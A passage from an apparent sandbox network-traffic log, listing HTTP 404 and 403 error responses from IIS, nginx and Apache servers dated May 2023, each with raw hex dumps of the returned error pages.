7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:11:24 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:11:51 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:11:54 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Tue, 30 May 2023 09:11:56 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:12:18 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:12:20 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:12:23 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:12:26 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 